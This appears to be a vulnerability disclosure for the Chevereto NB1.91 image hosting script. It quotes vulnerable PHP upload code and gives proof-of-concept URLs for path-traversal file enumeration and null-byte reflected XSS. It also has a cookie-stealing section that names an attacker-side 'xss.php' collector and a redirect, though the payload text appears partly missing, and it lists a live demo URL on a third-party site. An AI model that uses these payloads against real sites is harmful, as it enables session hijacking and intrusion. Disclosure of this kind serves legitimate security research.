======================================================================================== Vulnerable Software: Chevereto upload script Downloaded from: http://code.google.com/p/chevereto/downloads/list (http://code.google.com/p/chevereto/downloads/detail?name=chevereto_nb1.91.zip&can=2&q=) Official site: http://chevereto.com/ chevereto_nb1.91.zip Nightly Build 1.91 Featured Oct 2010 471 KB 32167 ======================================================================================== About software:See from vendor: http://chevereto.com/ chevereto is outstanding Image Hosting Script (c) chevereto.com ======================================================================================== Tested: *php.ini MAGIC_QUOTES_GPC OFF* Safe mode off /* OS: Windows XP SP2 (32 bit) Apache: 2.2.21.0 PHP Version: 5.2.17.17 MYSQL: 5.5.23 ======================================================================================== Vuln Desc: Vulnerable Code Section //http://site.tld/whereunpacked/Upload/engine.php if ($modo==2 || $modo==3) { // INFORMACION (ANCHO, ALTO y PESO) if ($modo==2) { if ($_GET['v']) { $id = $_GET['v']; $imagen = DIR_IM.$id; if (file_exists($imagen)==true) { $titulo = SEEING.' '.$id.' '.AT.' '; $info = getimagesize($imagen); //Obtenemos la informacion $statinfo = @stat($imagen); $ancho = $info[0]; $alto = $info[1]; $mime = $info['mime']; $tamano = $statinfo['size']; //Bytes $tamano_kb = round($tamano*0.0009765625, 2); $canales = $info['channels']; } else { unset($modo); $modo = 1; $spit = true; $errormsg = NOT_EXISTS; $titulo = NOT_EXISTS_TITLE.ESP_TITULO; } } } // LAS URL $URLimg = URL_SCRIPT.DIR_IM.$name; $URLthm = URL_SCRIPT.DIR_TH.$name; $URLvim = URL_SCRIPT.'?v='.$name; $URLshr = $URLvim; // Para no cambiar mas abajo $eu_img = urlencode($URLimg); File existense enumeration: http://192.168.0.15/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php Non persistent cROSS siTE sCRIPTING (XSS) http://192.168.0.15/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php%00 Note:*Null byte* usage is neccessary here when exploiting XSS.See the vulnerable code section. =======XSS STEAL COOKIE======== http://192.168.0.15/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php%00 ============EOF================ our charcoded XSS payload in this case is: And Finally: //xss.php = is our cookie stealer. location.replace("http://return_back.tld/blabla/");'); Demo: http://pics.openarmenia.com/?v=../index.php%00%3Cscript%3Ealert%281%29;%3C/script%3E //Chevereto NB1.6 rev2 ======================================================================================== Due trust to this issuse we can say previous versions too is affected by this vulns. =================================== EOF ================================================= ++++My Special Thanks to:++++ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com && to all AA Team &&+ to all Azerbaijani Black Hatz;) ++++++++++++++++++++++++++++++ Thank you. /AkaStep ^_^